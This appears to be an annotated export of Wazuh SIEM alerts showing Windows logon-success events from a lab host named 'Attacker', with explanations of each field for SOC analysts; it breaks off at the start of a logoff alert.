data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:31:09.1230899Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43757
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  5404
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:07.903+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:07.903+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  47
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533927.461580
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:31:13.4677661Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43759
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  13300
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows workstation logon success.

🧠 What happened? Windows workstation logon success.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:32:08.048+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:08.048+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows workstation logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60118
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533928.468918
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:31:17.3513724Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43763
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  5404
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 2 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002 Account Name: Attcker1 Account Domain: Attacker Logon ID: 0x25F1ED7 Linked Logon ID: 0x25F285D Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x624 Process Name: C:\Windows\System32\svchost.exe Network Information: Workstation Name: ATTACKER Source Network Address: 127.0.0.1 Source Port: 0 Detailed Authentication Information: Logon Process: User32 Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-21-1227732096-2714569048-1995468811-1002
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x25f1ed7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  User32
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.workstationName:  ATTACKER
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x624
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\svchost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.ipAddress:  127.0.0.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.ipPort:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x25f285d
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows workstation logon success.

🧠 What happened? Windows workstation logon success.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:32:08.074+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:08.074+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows workstation logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60118
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533928.476639
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:31:17.3513964Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43764
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  5404
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 2 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: No Impersonation Level: Impersonation New Logon: Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002 Account Name: Attcker1 Account Domain: Attacker Logon ID: 0x25F285D Linked Logon ID: 0x25F1ED7 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x624 Process Name: C:\Windows\System32\svchost.exe Network Information: Workstation Name: ATTACKER Source Network Address: 127.0.0.1 Source Port: 0 Detailed Authentication Information: Logon Process: User32 Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-21-1227732096-2714569048-1995468811-1002
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x25f285d
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  User32
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.workstationName:  ATTACKER
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x624
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\svchost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.ipAddress:  127.0.0.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.ipPort:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x25f1ed7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows User Logoff.

🧠 What happened? Windows User Logoff.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:32:08.124+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:08.124+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows User Logoff.
